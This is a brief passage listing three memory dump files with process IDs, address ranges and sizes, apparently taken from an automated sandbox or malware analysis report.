                                                              • memory/2468-247-0x0000000002090000-0x0000000002191000-memory.dmp (Filesize 1.0MB)
                                                              • memory/2616-256-0x0000000004FC0000-0x0000000004FC1000-memory.dmp (Filesize 4KB)
                                                              • memory/2704-276-0x0000000000A20000-0x0000000000B4A000-memory.dmp (Filesize 1.2MB)
